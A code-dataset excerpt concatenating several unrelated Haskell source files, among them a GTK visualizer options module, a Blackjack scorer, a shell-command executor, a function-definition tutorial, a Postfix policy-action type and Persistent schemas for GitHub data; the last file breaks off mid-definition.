| vbalalla/financial_contract_language | pfp-jun06/MontyHall.hs | mit | 1,584 | 0 | 11 | 352 | 605 | 338 | 267 | 38 | 2 |
-----------------------------------------------------------------------------
--
-- Module : ViewOptions
-- Copyright :
-- License : MIT
--
-- Maintainer : Tobias Fuchs
-- Stability : experimental
-- Portability : Win32, POSIX
--
-- |
--
-----------------------------------------------------------------------------
{-# OPTIONS -O2 -Wall #-}
module Drool.UI.ViewOptions (
initComponent, updateSettings
) where
import Data.IORef
import qualified Graphics.UI.Gtk as Gtk
import qualified Graphics.UI.Gtk.Builder as GtkBuilder
import Graphics.Rendering.OpenGL
import qualified Drool.Types as DT
import qualified Drool.ApplicationContext as AC
import qualified Drool.ContextObjects as AC
import qualified Drool.UI.GtkHelpers as GH
import qualified Drool.UI.Dialogs.FFTSurfaceDialog as FFTSurfaceDialog
import qualified Drool.UI.Visuals as Visuals
-- Initializes GUI component for view options.
-- Expects a GtkBuilder instance and default context settings.
initComponent :: GtkBuilder.Builder -> IORef AC.ContextSettings -> IORef AC.ContextObjects -> IO Bool
initComponent gtkBuilder contextSettings contextObjects = do
putStrLn "Initializing ViewOptions component"
defaultSettings <- readIORef contextSettings
button_view_perspectiveTop <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveTop"
_ <- Gtk.onClicked button_view_perspectiveTop $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Top }
button_view_perspectiveFront <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveFront"
_ <- Gtk.onClicked button_view_perspectiveFront $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Front }
button_view_perspectiveSide <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveSide"
_ <- Gtk.onClicked button_view_perspectiveSide $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Side }
button_view_perspectiveIso <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveIsometric"
_ <- Gtk.onClicked button_view_perspectiveIso $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Isometric }
scale_view_linScalingAdj <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjLinearScaling"
_ <- Gtk.onValueChanged scale_view_linScalingAdj $ do
val <- Gtk.adjustmentGetValue scale_view_linScalingAdj
settings <- readIORef contextSettings
contextSettings $=! settings { AC.scaling = (realToFrac(val)::Float) }
adjFixedRotationX <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationX"
_ <- Gtk.onValueChanged adjFixedRotationX $ do
val <- Gtk.adjustmentGetValue adjFixedRotationX
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotX = (realToFrac(val)::GLfloat) } }
adjFixedRotationY <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationY"
_ <- Gtk.onValueChanged adjFixedRotationY $ do
val <- Gtk.adjustmentGetValue adjFixedRotationY
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotY = (realToFrac(val)::GLfloat) } }
adjFixedRotationZ <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationZ"
_ <- Gtk.onValueChanged adjFixedRotationZ $ do
val <- Gtk.adjustmentGetValue adjFixedRotationZ
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotZ = (realToFrac(val)::GLfloat) } }
adjIncRotationX <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationX"
_ <- Gtk.onValueChanged adjIncRotationX $ do
val <- Gtk.adjustmentGetValue adjIncRotationX
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotX = (realToFrac(val)::GLfloat) } }
adjIncRotationY <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationY"
_ <- Gtk.onValueChanged adjIncRotationY $ do
val <- Gtk.adjustmentGetValue adjIncRotationY
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotY = (realToFrac(val)::GLfloat) } }
adjIncRotationZ <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationZ"
_ <- Gtk.onValueChanged adjIncRotationZ $ do
val <- Gtk.adjustmentGetValue adjIncRotationZ
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotZ = (realToFrac(val)::GLfloat) } }
adjBandRange1Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange1Amp"
_ <- Gtk.onValueChanged adjBandRange1Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange1Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = fVal : (drop 1 cAmps)
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange2Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange2Amp"
_ <- Gtk.onValueChanged adjBandRange2Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange2Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 1 cAmps ++ (fVal : (drop 2 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange3Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange3Amp"
_ <- Gtk.onValueChanged adjBandRange3Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange3Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 2 cAmps ++ (fVal : (drop 3 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange4Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange4Amp"
_ <- Gtk.onValueChanged adjBandRange4Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange4Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 3 cAmps ++ (fVal : (drop 4 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange5Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange5Amp"
_ <- Gtk.onValueChanged adjBandRange5Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange5Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 4 cAmps ++ [fVal]
contextSettings $=! settings { AC.rangeAmps = mAmps }
comboboxBlendingSource <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxBlendingSource"
Gtk.comboBoxSetActive comboboxBlendingSource 4
_ <- Gtk.on comboboxBlendingSource Gtk.changed $ do
settings <- readIORef contextSettings
modeIdx <- Gtk.comboBoxGetActive comboboxBlendingSource
contextSettings $=! settings { AC.blendModeSourceIdx = modeIdx }
comboboxBlendingFrameBuffer <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxBlendingFrameBuffer"
Gtk.comboBoxSetActive comboboxBlendingFrameBuffer 6
_ <- Gtk.on comboboxBlendingFrameBuffer Gtk.changed $ do
settings <- readIORef contextSettings
modeIdx <- Gtk.comboBoxGetActive comboboxBlendingFrameBuffer
contextSettings $=! settings { AC.blendModeFrameBufferIdx = modeIdx }
comboboxFeatureBassEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureBassEnergyTarget"
_ <- Gtk.on comboboxFeatureBassEnergyTarget Gtk.changed $ do
settings <- readIORef contextSettings
targetIdx <- Gtk.comboBoxGetActive comboboxFeatureBassEnergyTarget
contextSettings $=! settings { AC.featureBassEnergyTargetIdx = targetIdx }
comboboxFeatureSignalEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureSignalEnergyTarget"
_ <- Gtk.on comboboxFeatureSignalEnergyTarget Gtk.changed $ do
settings <- readIORef contextSettings
targetIdx <- Gtk.comboBoxGetActive comboboxFeatureSignalEnergyTarget
contextSettings $=! settings { AC.featureSignalEnergyTargetIdx = targetIdx }
adjFeatureSignalEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergySurfaceCoeff"
_ <- Gtk.onValueChanged adjFeatureSignalEnergySurfaceCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureSignalEnergySurfaceCoeff
contextSettings $=! settings { AC.featureSignalEnergySurfaceCoeff = realToFrac val }
adjFeatureSignalEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergyGridCoeff"
_ <- Gtk.onValueChanged adjFeatureSignalEnergyGridCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureSignalEnergyGridCoeff
contextSettings $=! settings { AC.featureSignalEnergyGridCoeff = realToFrac val }
adjFeatureBassEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergySurfaceCoeff"
_ <- Gtk.onValueChanged adjFeatureBassEnergySurfaceCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureBassEnergySurfaceCoeff
contextSettings $=! settings { AC.featureBassEnergySurfaceCoeff = realToFrac val }
adjFeatureBassEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergyGridCoeff"
_ <- Gtk.onValueChanged adjFeatureBassEnergyGridCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureBassEnergyGridCoeff
contextSettings $=! settings { AC.featureBassEnergyGridCoeff = realToFrac val }
buttonSetMarquee <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonSetMarquee"
entryMarquee <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToEntry "entryMarqueeText"
_ <- Gtk.onClicked buttonSetMarquee $ do
marqueeText <- Gtk.entryGetText entryMarquee
settings <- readIORef contextSettings
contextSettings $=! settings { AC.marqueeText = marqueeText }
_ <- Gtk.afterEntryActivate entryMarquee $ do
marqueeText <- Gtk.entryGetText entryMarquee
settings <- readIORef contextSettings
contextSettings $=! settings { AC.marqueeText = marqueeText }
buttonToggleAutoPerspectiveSwitch <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToToggleButton "buttonToggleAutoPerspectiveSwitch"
_ <- Gtk.onToggled buttonToggleAutoPerspectiveSwitch $ do
state <- Gtk.toggleButtonGetActive buttonToggleAutoPerspectiveSwitch
settings <- readIORef contextSettings
contextSettings $=! settings { AC.autoPerspectiveSwitch = state }
GH.bindAdjustment "adjAutoPerspectiveSwitchInterval" gtkBuilder contextSettings (\v settings -> settings { AC.autoPerspectiveSwitchInterval = round v })
GH.bindAdjustment "adjViewAngle" gtkBuilder contextSettings (\v settings -> settings { AC.viewAngle = realToFrac v })
GH.bindAdjustment "adjViewDistance" gtkBuilder contextSettings (\v settings -> settings { AC.viewDistance = realToFrac v })
GH.bindAdjustment "adjXLinScale" gtkBuilder contextSettings (\v settings -> settings { AC.xLinScale = realToFrac v })
GH.bindAdjustment "adjXLogScale" gtkBuilder contextSettings (\v settings -> settings { AC.xLogScale = realToFrac v })
GH.bindAdjustment "adjZLinScale" gtkBuilder contextSettings (\v settings -> settings { AC.zLinScale = realToFrac v })
GH.bindCheckButton "checkbuttonPlayback" gtkBuilder contextSettings (\v settings -> settings { AC.playbackEnabled = v })
GH.bindCheckButton "checkbuttonReverseBuffer" gtkBuilder contextSettings (\v settings -> settings { AC.reverseBuffer = v })
-- Lights
GH.bindCheckButton "checkbuttonLight1Enabled" gtkBuilder contextSettings (\v settings -> settings { AC.light0 = (AC.light0 settings) { AC.lightState = if v then Enabled else Disabled } })
GH.bindColorButton "colorbuttonLight1Ambient" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightAmbient = c } } )
GH.bindColorButton "colorbuttonLight1Diffuse" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightDiffuse = c } } )
GH.bindColorButton "colorbuttonLight1Specular" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightSpecular = c } } )
GH.bindCheckButton "checkbuttonLight2Enabled" gtkBuilder contextSettings (\v settings -> settings { AC.light1 = (AC.light1 settings) { AC.lightState = if v then Enabled else Disabled } })
GH.bindColorButton "colorbuttonLight2Ambient" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightAmbient = c } } )
GH.bindColorButton "colorbuttonLight2Diffuse" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightDiffuse = c } } )
GH.bindColorButton "colorbuttonLight2Specular" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightSpecular = c } } )
GH.bindButton "buttonVisualModelEdit" gtkBuilder contextSettings ( \_ -> do _ <- FFTSurfaceDialog.initComponent gtkBuilder
contextSettings
contextObjects
return () )
return True
updateSettings :: GtkBuilder.Builder -> AC.ContextSettings -> IO Bool
updateSettings gtkBuilder settings = do
GH.initAdjustment "adjLinearScaling" gtkBuilder (realToFrac $ AC.scaling settings)
GH.initAdjustment "adjFixedRotationX" gtkBuilder (realToFrac $ DT.rotX $ AC.fixedRotation settings)
GH.initAdjustment "adjFixedRotationY" gtkBuilder (realToFrac $ DT.rotY $ AC.fixedRotation settings)
GH.initAdjustment "adjFixedRotationZ" gtkBuilder (realToFrac $ DT.rotZ $ AC.fixedRotation settings)
GH.initAdjustment "adjIncRotationX" gtkBuilder (realToFrac $ DT.rotX $ AC.incRotation settings)
GH.initAdjustment "adjIncRotationY" gtkBuilder (realToFrac $ DT.rotY $ AC.incRotation settings)
GH.initAdjustment "adjIncRotationZ" gtkBuilder (realToFrac $ DT.rotZ $ AC.incRotation settings)
GH.initAdjustment "adjBandRange1Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 0)
GH.initAdjustment "adjBandRange2Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 1)
GH.initAdjustment "adjBandRange3Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 2)
GH.initAdjustment "adjBandRange4Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 3)
GH.initAdjustment "adjBandRange5Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 4)
GH.initCheckButton "checkbuttonPlayback" gtkBuilder (AC.playbackEnabled settings)
comboboxFeatureBassEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureBassEnergyTarget"
Gtk.comboBoxSetActive comboboxFeatureBassEnergyTarget (AC.featureBassEnergyTargetIdx settings)
comboboxFeatureSignalEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureSignalEnergyTarget"
Gtk.comboBoxSetActive comboboxFeatureSignalEnergyTarget (AC.featureSignalEnergyTargetIdx settings)
adjFeatureBassEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergyGridCoeff"
Gtk.adjustmentSetValue adjFeatureBassEnergyGridCoeff (realToFrac $ AC.featureBassEnergyGridCoeff settings)
adjFeatureSignalEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergyGridCoeff"
Gtk.adjustmentSetValue adjFeatureSignalEnergyGridCoeff (realToFrac $ AC.featureSignalEnergyGridCoeff settings)
adjFeatureBassEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergySurfaceCoeff"
Gtk.adjustmentSetValue adjFeatureBassEnergySurfaceCoeff (realToFrac $ AC.featureBassEnergySurfaceCoeff settings)
GH.initAdjustment "adjFeatureSignalEnergySurfaceCoeff" gtkBuilder (realToFrac $ AC.featureSignalEnergySurfaceCoeff settings)
GH.initAdjustment "adjAutoPerspectiveSwitchInterval" gtkBuilder (realToFrac $ AC.autoPerspectiveSwitchInterval settings)
GH.initCheckButton "checkbuttonLight1Enabled" gtkBuilder (if AC.lightState (AC.light0 settings) == Enabled then True else False)
GH.initColorButton "colorbuttonLight1Ambient" gtkBuilder (AC.lightAmbient $ AC.light0 settings)
GH.initColorButton "colorbuttonLight1Diffuse" gtkBuilder (AC.lightDiffuse $ AC.light0 settings)
GH.initColorButton "colorbuttonLight1Specular" gtkBuilder (AC.lightSpecular $ AC.light0 settings)
GH.initCheckButton "checkbuttonLight1Enabled" gtkBuilder (if AC.lightState (AC.light1 settings) == Enabled then True else False)
GH.initColorButton "colorbuttonLight2Ambient" gtkBuilder (AC.lightAmbient $ AC.light1 settings)
GH.initColorButton "colorbuttonLight2Diffuse" gtkBuilder (AC.lightDiffuse $ AC.light1 settings)
GH.initColorButton "colorbuttonLight2Specular" gtkBuilder (AC.lightSpecular $ AC.light1 settings)
return True
| fuchsto/drool | src/Drool/UI/ViewOptions.hs | mit | 17,814 | 0 | 18 | 2,707 | 4,317 | 2,078 | 2,239 | 228 | 3 |
module Eventful
( module X
) where
import Eventful.CommandHandler as X
import Eventful.EventBus as X
import Eventful.Projection as X
import Eventful.ProjectionCache.Types as X
import Eventful.ProcessManager as X
import Eventful.ReadModel.Class as X
import Eventful.Serializer as X
import Eventful.Store.Class as X
import Eventful.UUID as X
| jdreaver/eventful | eventful-core/src/Eventful.hs | mit | 345 | 0 | 4 | 48 | 76 | 55 | 21 | 11 | 0 |
module Cards.Blackjack(
computeHandValue,
Hand,
DeckOfCards,
HandScore(Score),
newHand,
blackjackDeck
)
where
import Cards.PlayingCards
import Data.Maybe
type Hand = [Card]
data HandScore = Bust | Score Int | BlackJack deriving (Ord, Show, Eq)
newHand :: DeckOfCards -> (Hand, DeckOfCards)
newHand d = ([], d)
blackjackDeck :: DeckOfCards
blackjackDeck = deckOfCards
isBlackjack :: Hand -> Bool
isBlackjack (c1:c2:[]) = (value Ace c1 && isRoyal c2) || (value Ace c2 && isRoyal c1)
isBlackjack _ = False
computeHandValue :: Hand -> HandScore
computeHandValue h = if isBlackjack h then BlackJack else getHandScore $ computeHandValue' h
computeHandValue' :: Hand -> [Int]
computeHandValue' [] = [0]
computeHandValue' [i] = cardValue i
computeHandValue' (x:xs) = let cv = computeHandValue' xs in
cardValue x >>= (\y -> map(y+) cv)
getHandScore :: [Int] -> HandScore
getHandScore [] = Score 0
getHandScore ss = if null v then Bust else Score (maximum v)
where v = filter (21 >=) ss
cardValue :: Card -> [Int]
cardValue (Card _ Ace) = [1, 11]
cardValue (Card _ x) = maybeToList $ lookup x $ zip [Two .. King] ([2..10] ++ repeat 10)
| smobs/HackJack | Cards/Blackjack.hs | mit | 1,147 | 0 | 11 | 201 | 475 | 257 | 218 | 34 | 2 |
-- |
--
-- Module : Exec
-- Description : Executes 'Command's.
-- License : MIT
--
-- Executes 'Command's.
--
module Exec ( execCommand, execConfigs ) where
import ExecConfig
import System.Process
-----------------------------------------------------------------------------
-- | Execute a 'Command'.
execCommand :: Command -> IO()
execCommand (Cmd cmd) = do
putStrLn $ "Executing: " ++ cmd
callCommand cmd
-- | Execute the 'Command's, build from the given configs.
execConfigs :: [ExecConfig] -> [ExecParams] -> DataConfig -> IO ()
execConfigs e p d = do
callCommand $ "mkdir -p " ++ logDir d
mapM_ execCommand $ createCommands e p d
| fehu/min-dat--data-mining-arff | src/Exec.hs | mit | 670 | 0 | 9 | 132 | 147 | 79 | 68 | 11 | 1 |
module CreatingFunctions where
import Data.List(sortBy,groupBy)
import Data.Array(array,(!))
-- By definition at top level
plus5 x = x + 5
last x = head(reverse x)
inits = (reverse . tail . reverse)
-- By cases
absolute x | x < 0 = -x
| x >= 0 = x
swap (x,y) | x < y = (x,y)
| x > y = (y,x)
| x==y = (x,y)
swap2 (x,y) | x > y = (y,x)
| otherwise = (x,y)
f x y z | x+y == z = True
| otherwise = False
-- By pattern matching
myand True False = False
myand True True = True
myand False False = False
myand False True = False
myand2 True True = True
myand2 x y = False
-- By us of a Library
smallest = minimum [3,7,34,1]
-- by local definition using where or let
ordered = sortBy backwards [1,76,2,5,9,45]
where backwards x y = compare y x
-- lambda expression
descending =
sortBy
(\ x y -> compare y x)
[1,76,2,5,9,45]
bySnd =
groupBy
(\ (x,y) (m,n) -> y==n)
[(1,'a'),(3,'a'),(2,'c')]
-- parenthesizing binary operators
six:: Integer
-- 1 + 2 + 3 + 0
six = foldr (+) 0 [1,2,3]
-- By section
add5ToAll = map (+5) [2,3,6,1]
-- by partial application
hasFour = any (==4)
doubleEach = map (\ x -> x+x)
-- By composition
hasTwo = hasFour . doubleEach
empty = (==0) . length
-- By combinator (higher order functions)
k x = \ y -> x
all3s = map (k 3) [1,2,3]
-- By using data and lookup
whatDay x = ["Sun","Mon","Tue","Wed","Thu","Fri","Sat"] !! x
first9Primes = array (1,9)
(zip [1..9]
[2,3,5,7,11,13,17,19,23])
nthPrime x = first9Primes ! x
| ladinu/cs457 | src/CreatingFunctions.hs | mit | 1,732 | 0 | 9 | 579 | 749 | 424 | 325 | 46 | 1 |
{-# LANGUAGE OverloadedStrings #-}
-----------------------------------------------------------------------------
-- |
-- Module : Network.Policy.Action
-- Copyright : (c) 2014 Stefan Bühler
-- License : MIT-style (see the file COPYING)
--
-- Maintainer : stbuehler@web.de
-- Stability : experimental
-- Portability : portable
--
-- Type for the policy "action=..." response data.
--
-----------------------------------------------------------------------------
module Network.Policy.Action
( PolicyAction(..)
, policyActionText
) where
import qualified Data.Text as T
{-|
Action to return as response to a policy request; for basic actions see
<http://www.postfix.org/access.5.html>. To execute complex actions in postfix
use "smtpd_restriction_classes" and return the name of your class.
-}
data PolicyAction
= Policy_Accept -- "OK"
| Policy_Accept_Num Int -- [200..299]
| Policy_Defer T.Text
| Policy_Defer_Num Int T.Text -- [400..499], string not empty
| Policy_Reject T.Text
| Policy_Reject_Num Int T.Text -- [500..599], string not empty
| Policy_Defer_If_Reject T.Text
| Policy_Defer_If_Permit T.Text
| Policy_Pass -- "DUNNO"
| Policy_RAW T.Text
deriving (Eq)
-- "debug" show strings, hinting which constructor was used
instance Show PolicyAction where
show (Policy_Accept ) = "OK"
show (Policy_Accept_Num code ) = "(ok) " ++ show code
show (Policy_Defer msg) = "DEFER " ++ T.unpack msg
show (Policy_Defer_Num code msg) = "(defer) " ++ show code ++ " " ++ T.unpack msg
show (Policy_Reject msg) = "REJECT " ++ T.unpack msg
show (Policy_Reject_Num code msg) = "(reject) " ++ show code ++ " " ++ T.unpack msg
show (Policy_Defer_If_Reject msg) = "DEFER_IF_REJECT " ++ T.unpack msg
show (Policy_Defer_If_Permit msg) = "DEFER_IF_PERMIT " ++ T.unpack msg
show (Policy_Pass ) = "DUNNO"
show (Policy_RAW raw) = "(raw) " ++ T.unpack raw
{-|
Build action string from 'PolicyAction' (the value to return in the "action"
response parameter).
-}
policyActionText :: Monad m => PolicyAction -> m T.Text
policyActionText (Policy_Accept ) = return "OK"
policyActionText (Policy_Accept_Num code ) = if code >= 200 && code <= 299 then return $ T.pack $ show code else fail $ "Invalid code for OK: " ++ show code
policyActionText (Policy_Defer msg) = return $ T.concat $ "DEFER" : if T.null msg then [] else [" ", msg]
policyActionText (Policy_Defer_Num code msg) =
if code >= 400 && code <= 499
then if not (T.null msg)
then return $ T.concat $ [T.pack (show code), " ", msg]
else fail $ "Empty message for defer code"
else fail $ "Invalid code for DEFER: " ++ show code
policyActionText (Policy_Reject msg) = return $ T.concat $ "REJECT" : if T.null msg then [] else [" ", msg]
policyActionText (Policy_Reject_Num code msg) =
if code >= 500 && code <= 599
then if not (T.null msg)
then return $ T.concat $ [T.pack (show code), " ", msg]
else fail $ "Empty message for reject code"
else fail $ "Invalid code for REJECT: " ++ show code
policyActionText (Policy_Defer_If_Reject msg) = return $ T.concat $ "DEFER_IF_REJECT" : if T.null msg then [] else [" ", msg]
policyActionText (Policy_Defer_If_Permit msg) = return $ T.concat $ "DEFER_IF_PERMIT" : if T.null msg then [] else [" ", msg]
policyActionText (Policy_Pass ) = return $ "DUNNO"
policyActionText (Policy_RAW raw) = return $ raw
| stbuehler/haskell-mail-policy | src/Network/Policy/Action.hs | mit | 3,468 | 28 | 11 | 696 | 912 | 484 | 428 | 49 | 10 |
{-# OPTIONS_GHC -Wall #-}
module Main where
import Protolude
import Test.Tasty (TestTree, testGroup, defaultMain)
import Test.DocTest
main :: IO ()
main = do
doctest ["app/words.lhs"]
defaultMain tests
tests :: TestTree
tests =
testGroup ""
[
]
| tonyday567/sfold | words/test/test.hs | mit | 269 | 0 | 8 | 60 | 76 | 42 | 34 | 13 | 1 |
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE EmptyDataDecls #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE MultiParamTypeClasses #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE QuasiQuotes #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE TypeFamilies #-}
module Kashmir.Github.Types where
import Control.Lens
import Data.Aeson
import Data.Aeson.Casing
import Data.Aeson.TH
import Data.Text hiding (drop)
import Data.Time
import Database.Persist
import Database.Persist.TH
import GHC.Generics
import Kashmir.Aeson
import Kashmir.Email
import Kashmir.Github.Types.Common
share [mkPersist sqlSettings {mpsGenerateLenses = True}
,mkMigrate "migrateGithub"]
[persistLowerCase|
GithubUser
login Text sqltype=text
avatarUrl URL sqltype=text
gravatarId URL Maybe sqltype=text
url URL sqltype=text
htmlUrl URL sqltype=text
followersUrl URL sqltype=text
followingUrl URL sqltype=text
gistsUrl URL sqltype=text
starredUrl URL sqltype=text
subscriptionsUrl URL sqltype=text
organizationsUrl URL sqltype=text
reposUrl URL sqltype=text
eventsUrl URL sqltype=text
receivedEventsUrl URL sqltype=text
siteAdmin Bool
name Text Maybe sqltype=text
company Text Maybe sqltype=text
blog Text Maybe sqltype=text
location Text Maybe sqltype=text
email Email
hireable Bool
bio Text Maybe sqltype=text
publicRepos Int
publicGists Int
followers Int
following Int
createdAt UTCTime
updatedAt UTCTime
Primary login
deriving Read Show Eq Generic
GithubRepository
ownerLogin Text sqltype=text
name Text sqltype=text
description Text Maybe sqltype=text
private Bool
fork Bool
url URL sqltype=text
htmlUrl URL sqltype=text
archiveUrl URL sqltype=text
assigneesUrl URL sqltype=text
blobsUrl URL sqltype=text
branchesUrl URL sqltype=text
cloneUrl URL sqltype=text
collaboratorsUrl URL sqltype=text
commentsUrl URL sqltype=text
commitsUrl URL sqltype=text
compareUrl URL sqltype=text
contentsUrl URL sqltype=text
contributorsUrl URL sqltype=text
deploymentsUrl URL sqltype=text
downloadsUrl URL sqltype=text
eventsUrl URL sqltype=text
forksUrl URL sqltype=text
gitCommitsUrl URL sqltype=text
gitRefsUrl URL sqltype=text
gitTagsUrl URL sqltype=text
gitUrl URL sqltype=text
hooksUrl URL sqltype=text
issueCommentUrl URL sqltype=text
issueEventsUrl URL sqltype=text
issuesUrl URL sqltype=text
keysUrl URL sqltype=text
labelsUrl URL sqltype=text
languagesUrl URL sqltype=text
mergesUrl URL sqltype=text
milestonesUrl URL sqltype=text
mirrorUrl URL Maybe sqltype=text
notificationsUrl URL sqltype=text
pullsUrl URL sqltype=text
releasesUrl URL sqltype=text
sshUrl URL sqltype=text
stargazersUrl URL sqltype=text
statusesUrl URL sqltype=text
subscribersUrl URL sqltype=text
subscriptionUrl URL sqltype=text
svnUrl URL sqltype=text
tagsUrl URL sqltype=text
teamsUrl URL sqltype=text
treesUrl URL sqltype=text
homepage URL Maybe sqltype=text
language Text Maybe sqltype=text
forksCount Int
stargazersCount Int
watchersCount Int
size Int
defaultBranch Text sqltype=text
openIssuesCount Int
hasIssues Bool
hasWiki Bool
hasPages Bool
hasDownloads Bool
pushedAt UTCTime
createdAt UTCTime
updatedAt UTCTime
Primary ownerLogin name
deriving Show Eq Generic
GithubOrganization
login Text sqltype=text
url URL sqltype=text
reposUrl URL sqltype=text
eventsUrl URL sqltype=text
hooksUrl URL sqltype=text
issuesUrl URL sqltype=text
membersUrl URL sqltype=text
publicMembersUrl URL sqltype=text
avatarUrl URL sqltype=text
description Text Maybe sqltype=text
Primary login
deriving Read Show Eq Generic
GithubRepositoryHook
githubRepositoryHookId Int
githubRepositoryOwnerLogin Text sqltype=text
githubRepositoryName Text sqltype=text
url URL sqltype=text
testUrl URL sqltype=text
pingUrl URL sqltype=text
name Text sqltype=text
-- "events": [
-- "push",
-- "pull_request"
-- ],
active Bool
-- "config": {
-- "url": "http://example.com/webhook",
-- "content_type": "json"
-- },
updatedAt UTCTime
createdAt UTCTime
Primary githubRepositoryHookId
Foreign GithubRepository fk_hook_parent githubRepositoryOwnerLogin githubRepositoryName
deriving Show Eq Generic
|]
instance FromJSON GithubUser where
parseJSON =
genericParseJSON $
defaultOptions {fieldLabelModifier =
\s ->
case s of
"_githubUserGithubUserId" -> "id"
